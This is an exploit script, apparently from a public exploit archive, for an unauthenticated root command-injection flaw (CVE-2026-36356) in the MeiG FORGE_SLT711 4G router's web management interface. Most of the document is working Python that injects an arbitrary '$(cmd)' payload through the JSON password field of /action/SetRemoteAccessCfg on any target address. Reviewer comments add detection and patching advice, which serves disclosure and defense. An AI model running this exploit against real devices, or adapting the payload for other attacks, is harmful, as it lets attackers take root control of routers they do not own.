# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln: JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth: None (endpoint missing from route.txt auth list)
Root: Commands execute as uid=0(root)
Type: Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil
Discovered: 2026-02-21
Tested on: FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

# NOTE(review): what this script actually observes is narrow — one POST to
# /action/SetRemoteAccessCfg carrying a JSON body whose "password" value is
# "$(<cmd>)", and a "retcode" field in the reply. The root-cause description
# above (unescaped sprintf into system(), route missing from the auth list)
# comes from the author's analysis of the firmware, not from anything this
# code checks. For defenders, that request shape is the concrete thing to
# look for in web-server or proxy logs on affected devices: a POST to that
# path where the password field contains shell substitution syntax, from a
# client that never authenticated. The durable fix is on the device side —
# the vendor's firmware update, and in the meantime keeping the management
# interface unreachable from untrusted networks.

import argparse
import json
import sys
import urllib.request
import urllib.error


def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
    """Send the single injection request and report whether the device accepted it.

    Args:
        ip: Target address, interpolated verbatim into the URL host part.
        cmd: Text placed inside ``$(...)`` in the JSON "password" field.
        port: HTTP port of the GoAhead management interface.
        timeout: Socket timeout in seconds for the one POST.

    Returns:
        True only when the reply parses as JSON and its ``retcode`` equals 0.
        That is an "accepted" signal from the handler, not proof that anything
        ran: the endpoint is blind and the output of *cmd* never appears in
        the HTTP response.
    """
    url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
    # The entire attack surface this script exercises is one JSON string.
    # json.dumps() escapes quotes/backslashes for the JSON layer only; what
    # the device does with the value afterwards is not visible from here.
    payload = json.dumps({"password": f"$({cmd})"})
    req = urllib.request.Request(
        url,
        data=payload.encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode()
        data = json.loads(body)
        if data.get("retcode") == 0:
            # "executed as root" restates the author's claim; the script
            # itself only sees retcode 0 (no placeholders in this f-string).
            print(f"[+] retcode:0 — command executed as root")
            return True
        else:
            print(f"[-] Unexpected response: {body}")
            return False
    except urllib.error.URLError as e:
        # Covers refused/unreachable hosts, timeouts and HTTP error statuses.
        print(f"[-] Connection failed: {e}")
        return False
    except Exception as e:
        # Reached for a non-JSON or non-UTF-8 body (JSONDecodeError,
        # UnicodeDecodeError) and anything else unexpected; reported as a
        # failure rather than re-raised.
        print(f"[-] Error: {e}")
        return False


def main() -> None:
    """Parse CLI flags, call exploit(), and exit 0 if the request was accepted, else 1."""
    p = argparse.ArgumentParser(
        description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
        epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
    )
    p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
    p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
    p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
    args = p.parse_args()
    print(f"[*] Target: {args.ip}:{args.port}")
    print(f"[*] Command: {args.cmd}")
    # Doubled braces are deliberate: this prints the literal text "$({cmd})"
    # to describe the wrapper, not the substituted command.
    print(f"[*] Payload: $({{cmd}}) inside password field")
    ok = exploit(args.ip, args.cmd, args.port, args.timeout)
    # Exit status mirrors exploit()'s return so the script is usable from shells/CI.
    sys.exit(0 if ok else 1)


if __name__ == "__main__":
    main()